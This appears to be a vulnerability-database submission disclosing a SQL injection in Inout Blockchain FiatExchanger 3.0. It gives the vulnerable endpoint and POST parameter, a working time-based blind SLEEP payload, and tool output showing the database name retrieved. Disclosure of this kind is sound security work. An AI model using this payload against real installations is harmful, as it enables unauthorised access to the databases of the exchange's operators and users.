Submit #177560: Inout Blockchain FiatExchanger 3.0 - SQL Injection
Information

Title: Inout Blockchain FiatExchanger 3.0 - SQL Injection

Description:

# Exploit Title: Inout Blockchain FiatExchanger 3.0 - SQL Injection
# Date: 04/07/2023
# Exploit Author: CraCkEr
# Vendor: Inout Scripts
# Vendor Homepage: https://www.inoutscripts.com/
# Software Link: https://www.inoutscripts.com/products/inout-blockchain-fiatexchanger/
# Version: 3.0
# Tested on: Windows 10 Pro
# Impact: Database Access

Release Notes:

SQL injection attacks can allow unauthorized access to sensitive data, modification of data and crash the application or make it unavailable, leading to lost revenue and damage to a company's reputation.

Path: /index.php/coins/update_marketboxslider

----------------------------------------------
POST /index.php/coins/update_marketboxslider HTTP/2

marketcurrency=[SQLI]&displaylimit=4
----------------------------------------------

POST parameter 'marketcurrency' is vulnerable to SQL Injection

---
Parameter: marketcurrency (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: marketcurrency=(SELECT(0)FROM(SELECT(SLEEP(6)))a)&displaylimit=4
---

[+] Starting the Attack

fetching current database
current database: '*****_blockchain_fiatexchanger_**'

[-] Done
User: skalvin (UID 49463)
Submission: 04.07.2023 17:58 (3 years ago)
Moderation: 11.07.2023 17:26 (7 days later)
Status: Accepted
VulDB Entry: 233577 [Nesote Inout Blockchain FiatExchanger 3.0 POST Parameter update_marketboxslider marketcurrency SQL injection]
Points: 17
